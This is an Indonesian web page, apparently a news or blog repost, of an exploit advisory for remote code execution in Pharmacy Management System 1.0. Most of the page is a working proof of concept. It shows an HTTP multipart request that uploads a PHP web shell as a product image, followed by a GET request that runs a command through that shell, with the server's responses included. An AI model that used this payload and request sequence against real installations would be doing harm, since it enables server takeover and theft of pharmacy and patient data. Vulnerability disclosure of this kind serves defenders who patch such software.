Sistem Manajemen Farmasi 1.0 Unggah Shell

  • Whatsapp
Entri Formulir CRM WordPress, Skrip Lintas Situs
Entri Formulir CRM WordPress Skrip Lintas Situs

News.nextcloud.asia

Sistem Manajemen Farmasi versi 1.0 mengalami kerentanan unggahan shell jarak jauh.

MD5 | b4498c42683756d4e785374cfa4da752

# Exploit Title: Pharmacy management system - Remote Code Execution (RCE)
# Date: 19/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

# Exploit :

You can upload a php shell file as a productImage

# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------

# Request sent as base user

POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"

-----------------------------208935235035266125502673738631--

# Response

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2022 20:43:17 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: ../product.php
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

Image uploaded successfully{"success":true,"messages":"Successfully Updated"}

# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel

# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2022 20:55:58 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Content-Length: 33
Connection: close
Content-Type: text/html; charset=UTF-8

…0xSaudi
</pre>
</body>
</html>

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.